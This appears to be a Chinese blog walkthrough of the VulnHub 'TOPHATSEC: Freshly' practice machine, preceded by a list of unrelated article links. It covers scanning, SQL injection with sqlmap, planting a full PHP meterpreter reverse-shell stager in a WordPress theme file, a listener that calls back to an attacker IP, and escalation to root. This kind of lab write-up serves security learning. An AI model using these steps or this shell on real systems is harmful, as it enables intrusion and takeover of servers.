- 1docker 创建容器时报错:WARNING: IPv4 forwarding is disabled. Networking will not work.
- 2全国职业院校技能大赛云计算技术与应用大赛国赛题库答案(2)_云计算应用 高职赛 题目答案
- 3VS编程问题-warning C4996: ’strdup’_strdup': the posix name for this item is deprecate
- 4Python多线程爬虫——数据分析项目实现详解_python 爬虫 数据分析
- 5基于FPGA的运动目标检测跟踪系统项目 ,FPGA项目,FPGA图像处理_目标检测系统移植到fpga
- 6Linux命令详解(2)ip命令_linux ip命令
- 7libevent库学习(1)
- 8Kaggle数据集Telco-Customer-Churn.csv特征相关性分析(用LabelEncoder编码)_customer-churn-records
- 9使用Unity的Input.GetAxis(““)控制物体移动、旋转
- 10软件测试/测试开发/全日制 | Python全栈开发实战:构建安全可靠的Web应用
VulnHub渗透测试实战靶场 - TOPHATSEC: FRESHLY_vulnhub tophatsec: freshly
赞
踩
环境下载
戳此进行环境下载
TOPHATSEC: FRESHLY靶机搭建
具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡
- 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式
- 将VMware中桥接模式网卡设置为VritualBox的Host-only
渗透测试
信息搜集
用
arp-scan探测一下目标靶机的IP:sudo arp-scan -l
用nmap探测一下目标靶机IP的信息:
sudo nmap -sS -A 192.168.56.104
漏洞挖掘
分别查看一下探测到的三个开放端口
进一步测试发现现8080和443端口都使用了WordPress
用
dirsearch扫描一下80端口:python3 dirsearch.py -u 192.168.56.104 -e *.php
访问
http://192.168.56.104/login.php,用burpsuite抓包将内容保存下来,利用sqlmap测试后发现存在SQL注入漏洞
- 利用sqlmap跑出数据库名:
sqlmap -r sql --dump-all
- 利用sqlmap跑出wordpress8080数据库中的表名:
sqlmap -r sql -D wordpress8080 --tables
- 利用sqlmap跑出users表中的字段名:
sqlmap -r sql -D wordpress8080 -T users --columns
- 利用sqlmap跑出wordpress8080数据库中users表中的数据:
sqlmap -r sql -D wordpress8080 -T users -C username,password --dump
得到用户名和密码:
admin:SuperSecretPassword
登录8080端口的web页面:http://192.168.56.104/login.php
wordpress有两种方式拿shell
- 添加插件,将准备好的格式正确的shell添加到.zip上传
- 直接编辑
getshell
进入页面:
http://192.168.56.104:8080/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen
用msfvenom生成一个php反弹shell的木马:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=1234 R > shell.php
shell内容
/*<?php /**/ error_reporting(0); $ip = '192.168.56.102'; $port = 1234; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
- 1
将shell插入命令执行漏洞页面,访问
http://192.168.56.104:8080/wordpress/wp-content/themes/twentythirteen/404.php,成功触发恶意代码
用msfconsole起一个监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.102
set lport 1234
run
- 1
- 2
- 3
- 4
- 5
- 6
再次访问
http://192.168.56.104:8080/wordpress/wp-content/themes/twentythirteen/404.php,成功反弹shell
提权
查看
/etc/passwd、用户组
发现可以直接
su提权到root
